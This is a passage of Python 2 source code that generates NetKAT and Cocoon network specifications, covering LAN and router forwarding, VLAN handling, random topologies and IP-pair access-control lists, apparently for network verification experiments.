return self.lans[self.subnet_to_lan[subnet]]
def lan_of_ip(self, ip):
parts = ip.split('.')
return self.lan_of_subnet('%s.%s.%s' % (parts[0], parts[1], parts[2]))
def get_next_id(self):
rv = self.next_id
self.next_id += 1
return rv
def gen_local_forwarding(self):
local_forwarding = []
for lan in self.lans:
# Build local forwarding.
local_pred = '\n+ '.join(
map(lambda h: 'sw = %s; port = 0' % h.mac, lan.hosts))
local_forwarding_act = '\n+ '.join(
map(lambda h: 'ip4Dst = %d; sw := %s; port := 1' % (int_of_ip(h.ip), h.mac), lan.hosts))
local_forwarding.append('( %s )\n\n;\n\n( %s )' % (local_pred, local_forwarding_act))
return local_forwarding
def gen_spec_0(self):
# Local forwarding.
local_forwarding = self.gen_local_forwarding()
# Non-local forwarding.
nonlocal_forwarding = []
for lan in self.lans:
local_pred = '\n+ '.join(map(lambda h: 'sw = %s; port = 0' % h.mac, lan.hosts))
local_ip = '\n+ '.join(map(lambda h: 'ip4Dst = %d' % int_of_ip(h.ip), lan.hosts))
nonlocal_forwarding.append('(%s); ~(%s)' % (local_pred, local_ip))
# Build ACL forwarding.
all_hosts = [h for lan in self.lans for h in lan.hosts]
acl_forwarding = '\n+ '.join(map(lambda h: 'ip4Dst = %d; sw := %s; port := 1' % (int_of_ip(h.ip), h.mac), all_hosts))
if self.args.export_hsa:
and_sym = ' and'
else:
and_sym = ';'
acl = ';\n'.join(['~(ip4Src = %d%s ip4Dst = %d)' % (int_of_ip(h1.ip), and_sym, int_of_ip(h2.ip)) for (h1, h2) in self.acl_pairs])
spec_0 = Spec0(
'( %s )' % '\n\n+\n\n'.join(local_forwarding),
'( %s )\n\n;\n\n( %s )\n\n;\n\n( %s )' % ( '\n+ '.join(nonlocal_forwarding),
acl,
acl_forwarding))
return spec_0
def gen_spec_0_1(self):
switch = self.get_next_id()
# Local forwarding.
local_forwarding = []
for lan in self.lans:
local_forwarding.append('\n+ '.join(['sw = %d; port = %d; ip4Dst = %d; port := %d' % (
switch, h1.mac, int_of_ip(h2.ip), h2.mac) for h1 in lan.hosts for h2 in lan.hosts]))
# Topology connecting each host to the single big switch.
host_topo = '\n+ '.join(['sw = %d; port = 0; sw := %d; port := %d' % (
h.mac, switch, h.mac) for lan in self.lans for h in lan.hosts])
router_topo = '\n+ '.join(['sw = %d; port = %d; sw := %d; port := 1' % (
switch, h.mac, h.mac) for lan in self.lans for h in lan.hosts])
# Non-local forwarding filter.
nonlocal_predicate = []
for lan in self.lans:
if self.args.export_hsa:
or_sym = ' or '
else:
or_sym = '\n+ '
local_pred = or_sym.join(map(lambda h: 'port = %d' % h.mac, lan.hosts))
local_ip = or_sym.join(map(lambda h: 'ip4Dst = %d' % int_of_ip(h.ip), lan.hosts))
nonlocal_predicate.append('sw = %d; (%s); ~(%s)' % (switch, local_pred, local_ip))
# Build ACL forwarding.
all_hosts = [h for lan in self.lans for h in lan.hosts]
acl_forwarding = '\n+ '.join(map(lambda h: 'ip4Dst = %d; port := %d' % (int_of_ip(h.ip), h.mac), all_hosts))
if self.args.export_hsa:
and_sym = ' and'
else:
and_sym = ';'
acl = ';\n'.join(['~(ip4Src = %d%s ip4Dst = %d)' % (int_of_ip(h1.ip), and_sym, int_of_ip(h2.ip)) for (h1, h2) in self.acl_pairs])
spec_0 = Spec0_1(
'( %s )' % '\n+\n'.join(local_forwarding),
'( %s )\n;\n( %s )\n;\n( %s )' % ( '\n+ '.join(nonlocal_predicate),
acl,
acl_forwarding),
host_topo,
router_topo,
'\n+ '.join(['sw = %d' % h.mac for lan in self.lans for h in lan.hosts]))
if self.args.export_hsa:
out = self.args.export_hsa
out.write('### SPEC 0 ###')
out.write('--- NETKAT SWITCH FUNCTION ---\n')
out.write('%s\n+\n%s\n' % (spec_0.local, spec_0.remote))
out.write('\n')
out.write('--- TOPOLOGY ---\n')
for lan in self.lans:
for h in lan.hosts:
out.write('(HOST %d, %d)--(SWITCH %d, %d)\n' % (h.mac, 1, switch, h.mac))
out.write('\n')
out.write('--- HOSTS ---\n')
for lan in self.lans:
for h in lan.hosts:
out.write('HOST %d, %s\n' % (h.mac, h.ip))
out.write('\n')
out.write('--- ACL (BLACKLIST IP PAIRS) ---\n')
for (src, dst) in self.acl_pairs:
out.write('(%s, %s)\n' % (src.ip, dst.ip))
out.write('\n')
return spec_0
def gen_spec_1(self, spec0):
# Non-local forwarding.
nonlocal_forwarding_to_router = []
local_forwarding_from_router = []
router_forwarding_to_router = []
for lan in self.lans:
# From host to router.
local_pred = '\n+ '.join(map(lambda h: 'sw = %s; port = 0' % h.mac, lan.hosts))
local_ip = '\n+ '.join(map(lambda h: 'ip4Dst = %d' % int_of_ip(h.ip), lan.hosts))
nonlocal_forwarding_to_router.append('(%s); ~(%s); sw := %d' % (local_pred, local_ip, lan.router))
# From router to host.
local_forwarding_act = '\n+ '.join(
map(lambda h: 'ip4Dst = %d; sw := %s; port := 1' % (int_of_ip(h.ip), h.mac), lan.hosts))
local_acl_pairs = filter(lambda (h1, h2): self.lan_of_ip(h2.ip) == lan, self.acl_pairs)
local_acl = '\n+ '.join(['ip4Src = %d; drop' % int_of_ip(h1.ip) for (h1, h2) in local_acl_pairs])
if len(local_acl) > 0:
local_forwarding_from_router.append(
'sw = %d; port = 1; (%s); (%s)' % (lan.router, local_acl, local_forwarding_act))
else:
local_forwarding_from_router.append(
'sw = %d; port = 1; (%s)' % (lan.router, local_forwarding_act))
# From router to router.
router_forwarding_to_router.append(
'\n+ '.join(
['ip4Dst = %d; sw := %d; port := 1' % (
int_of_ip(host.ip), self.lan_of_ip(host.ip).router) for host in lan.hosts]))
# From router to router.
router_to_router = '( %s )\n\n;\n\n( %s )' % (
'\n+ '.join(['sw = %d; port = 0' % lan.router for lan in self.lans]),
'\n+ '.join(router_forwarding_to_router))
return Spec1(
spec0.local
, '\n+ '.join(nonlocal_forwarding_to_router)
, router_to_router
, '\n+ '.join(local_forwarding_from_router)
, '\n+ '.join(['sw = %d' % h.mac for lan in self.lans for h in lan.hosts]))
def gen_spec_1_1(self):
# Preface: Move packets emitted from hosts to the router.
preface = []
for lan in self.lans:
for h in lan.hosts:
preface.append('sw = %d; sw := %d; port := %d' % (h.mac, lan.router, h.mac))
preface = 'port = 0; ( %s )' % ('\n+ '.join(preface))
router_to_host_topo = []
for lan in self.lans:
for h in lan.hosts:
router_to_host_topo.append('sw = %d; port = %d; sw := %d; port := 1' % (lan.router, h.mac, h.mac))
router_to_host_topo = '\n+ '.join(router_to_host_topo)
acl = '; '.join(['~(ip4Src = %d; ip4Dst = %d)' % (
int_of_ip(src.ip), int_of_ip(dst.ip))
for (src, dst) in self.acl_pairs])
router_to_host_pol = []
for lan in self.lans:
local_action = ' + '.join(['ip4Dst = %d; port := %d' % (int_of_ip(h.ip), h.mac) for h in lan.hosts])
local_pred = ' + '.join(['port = %d' % h2.mac for h2 in lan.hosts])
router_to_host_pol.append('sw = %d; ( %s ); ( %s )' % (
lan.router, local_pred, local_action))
router_to_host_pol.append('sw = %d; ~( %s ); ( %s ); ( %s )' % (
lan.router, local_pred, acl, local_action))
router_to_host_pol = '\n+ '.join(router_to_host_pol)
router_to_router_topo = []
for lan in self.lans:
for other_lan in filter(lambda x: x != lan, self.lans):
router_to_router_topo.append('sw = %d; port = %d; sw := %d; port := %d' % (
lan.router, other_lan.router,
other_lan.router, lan.router))
router_to_router_topo = '\n+ '.join(router_to_router_topo)
router_to_router_pol = []
for lan in self.lans:
tmp = []
for h in lan.hosts:
tmp.append('ip4Dst = %d' % (int_of_ip(h.ip)))
other_routers = ['sw = %d' % other_lan.router for other_lan in filter(lambda x: x != lan, self.lans)]
router_to_router_pol.append('( %s );\n( %s );\nport := %d' % (
'\n+ '.join(other_routers),
'\n+ '.join(tmp),
lan.router))
router_to_router_pol = '\n\n+\n\n'.join(router_to_router_pol)
hosts = '\n+ '.join(['sw = %d' % h.mac for lan in self.lans for h in lan.hosts])
return Spec1_1( preface
, router_to_host_topo
, router_to_host_pol
, router_to_router_topo
, router_to_router_pol
, hosts)
def gen_spec_2_1(self, spec11):
# Local and host-to-router are unchanged from spec1. Router-to-router
# now replaces the ethDst with the target gateway router at the source
# gateway router, and router-to-host reconstitutes the appropriate
# ethDst.
# Build router-to-router network.
g = connected_waxman_graph(self.num_routers)
relabel = {i:self.get_next_id() for i in xrange(self.num_routers)}
for n in g:
g.node[n]['type'] = 'switch'
networkx.relabel_nodes(g, relabel, copy=False)
for lan in self.lans:
g.add_node(lan.router, type='router')
g.add_edge(lan.router, relabel[random.randrange(self.num_routers)])
add_ports_to_networkx(g, self.next_id)
self.routers = g
router_to_router_preface = []
for lan in self.lans:
tmp = []
for h in lan.hosts:
tmp.append('ip4Dst = %d' % (int_of_ip(h.ip)))
other_routers = ['sw = %d' % other_lan.router for other_lan in filter(lambda x: x != lan, self.lans)]
router_to_router_preface.append('( %s );\n( %s );\nethDst := %d' % (
'\n+ '.join(other_routers),
'\n+ '.join(tmp),
lan.router))
router_to_router_preface = '\n\n+\n\n'.join(router_to_router_preface + ['pass'])
router_to_router_tail = '\n+ '.join(['sw = %d; ip4Dst = %d; ethDst := %d' % (
lan.router, int_of_ip(h.ip), h.mac) for lan in self.lans for h in lan.hosts]
+ ['pass'])
router_to_router_pol = spp_of_networkx(self.routers)
router_to_router_topo = topology_of_networkx(self.routers)
return Spec2_1( spec11.preface
, spec11.router_to_host_topo
, spec11.router_to_host_pol
, router_to_router_topo
, router_to_router_pol
, router_to_router_preface
, router_to_router_tail
, spec11.hosts)
def gen_spec_2(self, spec1):
# Local and host-to-router are unchanged from spec1. Router-to-router
# now replaces the ethDst with the target gateway router at the source
# gateway router, and router-to-host reconstitutes the appropriate
# ethDst.
# Build router-to-router network.
g = connected_waxman_graph(self.num_routers)
relabel = {i:self.get_next_id() for i in xrange(self.num_routers)}
for n in g:
g.node[n]['type'] = 'switch'
networkx.relabel_nodes(g, relabel, copy=False)
for lan in self.lans:
g.add_node(lan.router, type='router')
g.add_edge(lan.router, relabel[random.randrange(self.num_routers)])
add_ports_to_networkx(g, self.next_id)
self.routers = g
router_to_host_preface = []
for lan in self.lans:
p = '\n+ '.join(['ip4Dst = %d; ethDst := %d' % (int_of_ip(h.ip), h.mac) for h in lan.hosts])
router_to_host_preface.append(
'sw = %d; ethDst = %d; ( %s ); port := 1' % (lan.router, lan.router, p))
router_to_host = '( %s )\n\n+\n\n( %s )' % ('\n+ '.join(router_to_host_preface), spec1.router_to_host)
router_to_router_topo = topology_of_networkx(self.routers)
router_to_router_pol = spp_of_networkx(self.routers)
return Spec2(spec1.local, spec1.host_to_router, router_to_router_topo, router_to_router_pol, router_to_host, spec1.host_switches)
def gen_spec_3(self, spec2):
# Router-to-router remains the same, but host-to-router and
# router-to-host change to acount for (a) local L2 switching and (b)
# adding VLAN and moving some subnet hosts to different physical LANs.
# Permute hosts.
host_to_lan = {}
host_to_vrouter = {}
remote_hosts = {lan.vlan:set([]) for lan in self.lans}
vlan_to_hosts = {lan.vlan:set([]) for lan in self.lans}
for lan in self.lans:
for h in lan.hosts:
host_to_vrouter[h] = lan.router
vlan_to_hosts[h.vlan].add(h)
if (random.random() < PROB_NONLOCAL_HOST):
lan.hosts.remove(h)
choice = random.choice(self.lans)
choice.hosts.append(h)
host_to_lan[h] = choice
remote_hosts[h.vlan].add(h)
else:
host_to_lan[h] = lan
# Generate random L2 topologies for each LAN.
for lan in self.lans:
g = connected_waxman_graph(self.num_switches_per_lan)
relabel = {i:self.get_next_id() for i in xrange(self.num_switches_per_lan)}
for n in g:
g.node[n]['type'] = 'switch'
networkx.relabel_nodes(g, relabel, copy=False)
add_ports_to_networkx(g, 2)
# Attach router.
attach_point = random.randrange(self.num_switches_per_lan)
g.add_node(lan.router, type='router', ports={relabel[attach_point]:1})
g.add_edge(lan.router, relabel[attach_point])
ports_d = g.node[relabel[attach_point]]['ports']
ports = ports_d.values()
if len(ports) > 0:
ports.sort()
ports_d[lan.router] = ports[-1] + 1
else:
ports_d[lan.router] = 2
# Attach hosts.
for h in lan.hosts:
attach_point = random.randrange(self.num_switches_per_lan)
g.add_node(h.mac, type='host', ports={relabel[attach_point]:1}, host=h)
g.add_edge(h.mac, relabel[attach_point])
ports_d = g.node[relabel[attach_point]]['ports']
ports = ports_d.values()
if len(ports) > 0:
ports.sort()
ports_d[h.mac] = ports[-1] + 1
else:
ports_d[h.mac] = 2
check_networkx(g)
lan.g = g
if args.debug:
for lan in self.lans:
for n in lan.g:
d = lan.g.node[n]
sys.stderr.write('%s %d: %s\n' % (d['type'], n, d['ports']))
sys.stderr.write('\n')
preface = []
topo = []
pol = []
for lan in self.lans:
# Generate host preface:
# sw = h.id; port = 0; ip4Src = h.ip; vlan := h.vlan; sw := neighbor(h); port := neighbor(h)
for h in lan.hosts:
neighbor = lan.g[h.mac].keys()[0]
neighbor_port = lan.g.node[neighbor]['ports'][h.mac]
preface.append(
'sw = %d; port = 0; ip4Src = %d; vlan := %d; sw := %d; port := %d' % (
h.mac, int_of_ip(h.ip), h.vlan, neighbor, neighbor_port
))
# Generate intra-LAN L2 forwarding.
t = topology_of_networkx(lan.g)
l2 = spp_of_networkx(lan.g)
assert(l2)
# Attach VLANs at the hosts.
attach_vlan = ['sw = %d; ~(ethDst = %d); vlan := %d' % (h.mac, h.mac, h.vlan) for h in lan.hosts]
# For outgoing traffic, if the packet VLAN is the same as the
# router VLAN:
# ... and the destination host is part of THE SAME VLAN, then write
# the ethDst to be the router associated with the target host.
if len(remote_hosts[lan.vlan]) > 0:
p1 = 'sw = %d; port = 1; vlan = %d; ( %s )' % (
lan.router, lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip), host_to_lan[h].router)
for h in remote_hosts[lan.vlan]]))
else:
p1 = 'drop'
# ... and the destination host is part of a DIFFERENT VLAN, then
# write the ethDst to be the router associated with the target
# VLAN.
#
# NB: The NetKAT decision procedure doesn't support IP masks, so we
# need to enumerate every other host.
p2 = 'sw = %d; port = 1; vlan = %d;\n( %s )' % (
lan.router,
lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip),
host_to_vrouter[h])
for h in host_to_vrouter if h.vlan != lan.vlan]))
# For outgoing traffic, if the packet VLAN is NOT the same as the
# router VLAN, then send it to the router associated with its VLAN.
p3 = 'sw = %d; port = 1; ( %s )' % (lan.router,
'\n+ '.join(['vlan = %d; ethDst := %d' % (lan2.vlan, lan2.router)
for lan2 in filter(lambda l: l != lan, self.lans)]))
# For incoming traffic, if the packet VLAN is the same as the
# router VLAN, then:
# ... if the target host is in the LAN, write the ethDst of the
# target host.
hosts_in_lan_and_vlan = filter(lambda h: h.vlan == lan.vlan, lan.hosts)
if len(hosts_in_lan_and_vlan) > 0:
p4 = 'sw = %d; ~(port = 1); vlan = %d; ( %s )' % (
lan.router, lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip), h.mac)
for h in hosts_in_lan_and_vlan]))
else:
p4 = 'drop'
# ... if the target host is remote, write the ethDst of the router
# associated with this host.
if len(remote_hosts[lan.vlan]) > 0:
p5 = 'sw = %d; ~(port = 1); vlan = %d; ( %s )' % (
lan.router, lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip), host_to_lan[h].router)
for h in remote_hosts[lan.vlan]]))
else:
p5 = 'drop'
# For incoming traffic, if the packet VLAN is NOT the same as the
# router VLAN, then:
# The packet is intra-VLAN traffic, but its LAN houses a remote
# host for that VLAN.
nonlocal_hosts = filter(lambda h: h.vlan != lan.vlan, lan.hosts)
if len(nonlocal_hosts) > 0:
p6 = 'sw = %d; ~(port = 1); ( %s )' % (lan.router,
'\n+ '.join(['vlan = %d; ip4Dst = %d; ethDst := %d' % (
h.vlan, int_of_ip(h.ip), h.mac)
for h in nonlocal_hosts]))
else:
p6 = 'drop'
# The packet is inter-VLAN traffic destined for a host in this
# router's VLAN, and:
# ... the target host is in this LAN.
if self.args.export_hsa:
and_sym = ' and'
else:
and_sym = ';'
acl = ';\n '.join(['~(ip4Src = %d%s ip4Dst = %d)' % (int_of_ip(src.ip), and_sym, int_of_ip(dst.ip))
for (src, dst) in filter(lambda (src, dst): dst in vlan_to_hosts[lan.vlan], self.acl_pairs)])
if acl == '':
acl = 'pass'
p7 = 'sw = %d; ~(port = 1); ~(vlan = %d);\n( %s );\n( %s ); vlan := %d' % (
lan.router,
lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip), h.mac)
for h in filter(lambda h: h.vlan == lan.vlan, lan.hosts)]),
acl, lan.vlan)
# ... the target host is elsewhere.
if len(remote_hosts[lan.vlan]) > 0:
p8 = 'sw = %d; ~(port = 1); ~(vlan = %d); \n( %s );\n( %s ); vlan := %d' % (
lan.router,
lan.vlan,
'\n+ '.join(
['ip4Dst = %d; ethDst := %d' % (int_of_ip(h.ip), host_to_lan[h].router)
for h in remote_hosts[lan.vlan]]),
acl, lan.vlan)
else:
p8 = 'drop'
topo.append(t)
pol.append("""
( {l2} )
+
((
( {p1} )
+
( {p2} )
+
( {p3} )
) ; (
{router_to_router_pol}
))
+
((
( {p4} )
+
( {p6} )
+
( {p7} )
) ; (
{l2}
))
+
( {p5} )
+
( {p8} )
""".format(
l2=l2,
p1=p1,
p2=p2,
p3=p3,
p4=p4,
p5=p5,
p6=p6,
p7=p7,
p8=p8,
router_to_router_pol=spec2.router_to_router_pol))
spec3 = Spec3(
'\n+ '.join(preface),
'\n\n+\n\n'.join(topo),
'\n\n+\n\n'.join(pol),
spec2.router_to_router_topo,
spec2.router_to_router_pol,
spec2.hosts)
if self.args.export_hsa:
out = self.args.export_hsa
out.write('### SPEC 3 ###')
out.write('--- NETKAT SWITCH FUNCTION ---\n')
out.write('%s\n+\n%s\n' % (spec3.local_pols, spec3.router_to_router_pol))
out.write('\n')
out.write('--- TOPOLOGY ---\n')
for lan in self.lans:
for h in lan.hosts:
for g in [lan.g for lan in self.lans] + [self.routers]:
export_topology_of_networkx(g, out)
out.write('\n')
out.write('--- HOSTS ---\n')
for lan in self.lans:
for h in lan.hosts:
out.write('HOST %d, %s\n' % (h.mac, h.ip))
out.write('\n')
out.write('--- ACL (BLACKLIST IP PAIRS) ---\n')
for (src, dst) in self.acl_pairs:
out.write('(%s, %s)\n' % (src.ip, dst.ip))
out.write('\n')
return spec3
def export_cocoon(self):
out = self.args.export_cocoon
# Make a new graph that connects the zones to the router fabric.
g = self.routers
for lan in self.lans:
g = copy_compose(lan.g, g)
for n in lan.g:
for neighbor in lan.g.node[n]['ports']:
g.node[n]['ports'][neighbor] = lan.g.node[n]['ports'][neighbor]
# FUNCTION cHost
out.write('function cHost(hid_t hid): bool =\n')
out.write(' or\n'.join([" hid == 64'd%d" % h.mac for lan in self.lans for h in lan.hosts]))
out.write('\n')
# FUNCTION cVlan
out.write('function cVlan(vid_t vid): bool =\n')
out.write(' or\n'.join([" vid == 12'd%d" % lan.vlan for lan in self.lans]))
out.write('\n')
# FUNCTION vidRouterMAC
vid_map = ["vid == 12'd%d: 48'h%x;" % (lan.vlan, lan.router)
for lan in self.lans]
vid_map = '\n '.join(vid_map)
out.write('''
function vidRouterMAC(vid_t vid): MAC =
case {{
{vid_map}
default: 48'h0;
}}
'''.format(vid_map = vid_map))
# FUNCTION ip2vid
ip_map = ["ip == 32'h%x: 12'd%d;" % (int_of_ip(h.ip), h.vlan) for lan in self.lans for h in lan.hosts]
ip_map = '\n '.join(ip_map)
out.write('''
function ip2vlan(IP4 ip): vid_t =
case {{
{ip_map}
default: 12'd0;
}}
'''.format(ip_map = ip_map))
# FUNCTION hid2ip
m = ["hid == 64'd%d: 32'h%x;" % (h.mac, int_of_ip(h.ip)) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function hid2ip(hid_t hid): IP4 =
case {{
{m}
default: 32'd0;
}}
'''.format(m = m))
# FUNCTION ip2hid
m = ["ip == 32'h%x: 64'd%d;" % (int_of_ip(h.ip), h.mac) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function ip2hid(IP4 ip): hid_t =
case {{
{m}
default: 64'd0;
}}
'''.format(m = m))
# FUNCTION acl
m = ["(ip.src == 32'h%x and ip.dst == 32'h%x)" % (
int_of_ip(src.ip), int_of_ip(dst.ip))
for (src, dst) in self.acl_pairs]
m = ' or \n '.join(m)
out.write('''
function acl(vid_t srcvlan, vid_t dstvlan, ip4_t ip): bool =
{m}
'''.format(m = m))
# FUNCTION aclSrc, aclDst (derived)
out.write('''
function aclSrc(vid_t srcvlan, vid_t dstvlan, ip4_t ip): bool = acl(srcvlan, dstvlan, ip)
function aclDst(vid_t srcvlan, vid_t dstvlan, ip4_t ip): bool = true
''')
# FUNCTION cZone
m = ["zid == 32'd%d" % lan.vlan for lan in self.lans] + ["zid == 32'd0"]
m = ' or \n '.join(m)
out.write('''
function cZone(zid_t zid): bool =
{m}
'''.format(m = m))
# FUNCTION cRouter
m = ["rid == 64'd%d" % lan.router for lan in self.lans]
m = ' or \n '.join(m)
out.write('''
function cRouter(hid_t rid): bool =
{m}
'''.format(m = m))
# FUNCTION portConnected
out.write('function portConnected(pid_t pid): bool = true (* assume all ports are connected *)\n')
# FUNCTION routerPortZone
zone_router_ports = []
for lan in self.lans:
zone_router_ports += ["pid == pid_t{64'd%d, 16'd%d}: 32'd%d;" % (
lan.router, port, lan.vlan)
for port in lan.g.node[lan.router]['ports'].values()]
zone_router_ports = '\n '.join(zone_router_ports)
out.write('''
function routerPortZone(pid_t pid): zid_t =
case {{
{zone_router_ports}
default: 32'd0;
}}
'''.format( zone_router_ports = zone_router_ports ))
# FUNCTION pid2mac
hosts = ["pid == pid_t{64'd%d, 16'd1}: 48'h%x;" % ( h.mac, h.mac)
for lan in self.lans for h in lan.hosts]
hosts = '\n '.join(hosts)
routers = ["pid == pid_t{64'd%d, 16'd%d}: 48'h%x;" % (lan.router, port, lan.router)
for lan in self.lans for port in g.node[lan.router]['ports'].values()]
routers = '\n '.join(routers)
out.write('''
function pid2mac(pid_t pid): MAC =
case {{
{hosts}
{routers}
default: 48'h0;
}}
'''.format(hosts=hosts, routers=routers))
# FUNCTION mac2pid
# Note the following assumptions on gateway routers:
# - all gateway routers have exactly two ports
# - port 1 connects to the gateway's zone
# - the other port is > 1 and connects to the router-to-router fabric
# (i.e. zone 0)
# NB: turns out this only needs to be defined for gateway router ports
# on the interior router fabric.
routers = []
for lan in self.lans:
assert(len(self.routers.node[lan.router]['ports']) == 1)
routers.append("mac == 48'h%x: pid_t{64'd%d, 16'd%d};" % (
lan.router, lan.router, self.routers.node[lan.router]['ports'].values()[0]))
routers = '\n '.join(routers)
out.write('''
function mac2pid(MAC mac): pid_t =
case {{
{routers}
default: pid_t{{64'd0, 16'd0}};
}}
'''.format(hosts=hosts, routers=routers))
# FUNCTION l3NextHop
m = []
for src_lan in self.lans:
for dst_lan in self.lans:
if src_lan == dst_lan:
continue
m.append("rid == 64'd%d and vid == 12'd%d: nexthop_t{48'h%x, 16'd%d};" % (
src_lan.router,
dst_lan.vlan,
dst_lan.router,
self.routers.node[src_lan.router]['ports'].values()[0] ))
m = '\n '.join(m)
out.write('''
function l3NextHop(hid_t rid, vid_t vid): nexthop_t =
case {{
{m}
default: nexthop_t{{48'h0, 16'd0}};
}}
'''.format(m=m))
# FUNCTION cSwitch
local_switches = ["sid == 64'd%d" % n
for lan in self.lans
for n in lan.g
if lan.g.node[n]['type'] == 'switch']
router_switches = ["sid == 64'd%d" % n
for n in self.routers
if self.routers.node[n]['type'] == 'switch']
routers = ["sid == 64'd%d" % lan.router for lan in self.lans]
switches = ' or\n '.join(local_switches + router_switches + routers)
out.write('''
function cSwitch(hid_t sid): bool =
{switches}
'''.format( switches=switches ))
# FUNCTION link
local_links = ["pid == pid_t{64'd%d, 16'd%d}: pid_t{64'd%d, 16'd%d};" % (
n, lan.g.node[n]['ports'][neighbor], neighbor, lan.g.node[neighbor]['ports'][n])
for lan in self.lans for n in lan.g for neighbor in lan.g.node[n]['ports']]
local_links = '\n '.join(local_links)
router_links = ["pid == pid_t{64'd%d, 16'd%d}: pid_t{64'd%d, 16'd%d};" % (
n, self.routers.node[n]['ports'][neighbor], neighbor, self.routers.node[neighbor]['ports'][n])
for n in self.routers for neighbor in self.routers.node[n]['ports']]
router_links = '\n '.join(router_links)
out.write('''
function link(pid_t pid): pid_t =
case {{
{local_links}
{router_links}
default: pid_t{{64'd0, 16'd0}};
}}
'''.format( local_links = local_links
, router_links = router_links ))
# FUNCTION l2distance
path_lengths = networkx.shortest_path_length(g)
max_shortest_path = max([path_lengths[src][dst] for src in g for dst in g])
max_shortest_zone_path = max([path_lengths[lan.router][h.mac] for lan in self.lans for h in lan.hosts])
assert(max_shortest_path > max_shortest_zone_path)
distances, out_ports = cocoon_of_networkx(g)
# l2distance(sw, vid, dst) cases:
# From the whiteboard:
#
# if sw in vid zone and dst in vid zone:
# shortest path routing to dst.
# if sw is not core switch and not in vid zone and dst not in vid zone:
# route to gateway.
# if sw in core and dst not special case:
# route to gateway (vid)
# if sw in core and dst is special case:
# route to dst
# if sw in core and dst is gateway router:
# route to gateway (dst)
#
# Reworked:
#
# sw in vid zone and dst is host in vid zone
# sw in vid zone and dst is host not in vid zone
# sw in vid zone (not core) and dst is router: forward to router
# sw in core and dst is host in vid zone (i.e. not special)
# sw in core and dst is host not in vid zone (i.e. special)
# sw in core and dst is router: forward to router
# sw not in vid zone and dst is host in vid zone
# sw not in vid zone and dst is host not in vid zone: drop
# sw not in vid zone (but also not core) and dst is router
#
# Idea: use fall-through nature of 'case' statements to prioritize
# as follows.
#
# 1. Do destination L2 routing for all special hosts (i.e. not in
# their home zone) for in-VLAN traffic.
# 2. For zone switches, send non-zone traffic to local gateway.
# 3. For zone switches (and routers), send local (in-zone) traffic
# to local host.
# 4. For zone switches, send router-destined traffic to local gateway.
# 5. For core switches (and routers), send vlan traffic to vlan
# gateway.
# 6. For core switches (and routers), send router-destined traffic
# to router.
use_optimized = True
if use_optimized:
# 1. Do destination L2 routing for all special hosts (i.e. not in
# their home zone) for in-VLAN traffic.
d1 = []
f1 = []
# For each host not in the zone associated with its subnet:
for lan in self.lans:
for h in lan.get_nonlocal_hosts():
for switch in g:
if g.node[switch]['type'] == 'host':
continue
d1.append("hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 8'd%d;" % (
switch, h.vlan, h.mac, distances[switch][h.mac]))
f1.append("hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 16'd%d;" % (
switch, h.vlan, h.mac, out_ports[switch][h.mac]))
# 2. For zone switches, send non-zone traffic to local gateway.
d2 = []
f2 = []
for lan in self.lans:
for switch in lan.g:
if lan.g.node[switch]['type'] != 'switch':
continue
d2.append("hid == 64'd%d and vid != 12'd0 and vid != 12'd%d: 8'd%d;" % (
switch, lan.vlan, distances[switch][lan.router] + 2 * max_shortest_path))
f2.append("hid == 64'd%d and vid != 12'd0 and vid != 12'd%d: 16'd%d;" % (
switch, lan.vlan, out_ports[switch][lan.router]))
# 3. For zone switches (and routers), send local (in-zone) traffic
# to local host.
d3 = []
f3 = []
for lan in self.lans:
for switch in lan.g:
if lan.g.node[switch]['type'] == 'host':
continue
for h in lan.hosts:
# Skip hosts not part of this zone's VLAN.
if h.vlan != lan.vlan:
continue
d3.append("hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.vlan, h.mac, distances[switch][h.mac]))
f3.append("hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.vlan, h.mac, out_ports[switch][h.mac]))
# 4. For zone switches, send router-destined traffic to local gateway.
d4 = []
f4 = []
for lan in self.lans:
for switch in lan.g:
if lan.g.node[switch]['type'] != 'switch':
continue
d4.append("hid == 64'd%d and vid != 12'd0 and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.router, distances[switch][lan.router]))
f4.append("hid == 64'd%d and vid != 12'd0 and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.router, out_ports[switch][lan.router]))
# 5. For core switches (and routers), send vlan traffic to vlan
# gateway.
d5 = []
f5 = []
for lan in self.lans:
for switch in self.routers:
if switch == lan.router:
continue
d5.append("hid == 64'd%d and vid == 12'd%d: 8'd%d;" % (
switch, lan.vlan, distances[switch][lan.router] + 2 * max_shortest_zone_path))
f5.append("hid == 64'd%d and vid == 12'd%d: 16'd%d;" % (
switch, lan.vlan, out_ports[switch][lan.router]))
# 6. For core switches (and routers), send router-destined traffic
# to router.
d6 = []
f6 = []
for lan in self.lans:
for switch in self.routers:
if switch == lan.router:
continue
d6.append("hid == 64'd%d and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.router, distances[switch][lan.router]))
f6.append("hid == 64'd%d and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.router, out_ports[switch][lan.router]))
out.write('''
function l2distance(hid_t hid, vid_t vid, MAC dstaddr): uint<8> =
case {{
{d1}
{d2}
{d3}
{d4}
{d6}
{d5}
default: 8'd0;
}}
'''.format( d1='\n '.join(d1)
, d2='\n '.join(d2)
, d3='\n '.join(d3)
, d4='\n '.join(d4)
, d5='\n '.join(d5)
, d6='\n '.join(d6) ))
# FUNCTION l2NextHop
out.write('''
function l2NextHop(hid_t hid, vid_t vid, MAC dstaddr): uint<16> =
case {{
{f1}
{f2}
{f3}
{f4}
{f6}
{f5}
default: 16'd0;
}}
'''.format( f1='\n '.join(f1)
, f2='\n '.join(f2)
, f3='\n '.join(f3)
, f4='\n '.join(f4)
, f5='\n '.join(f5)
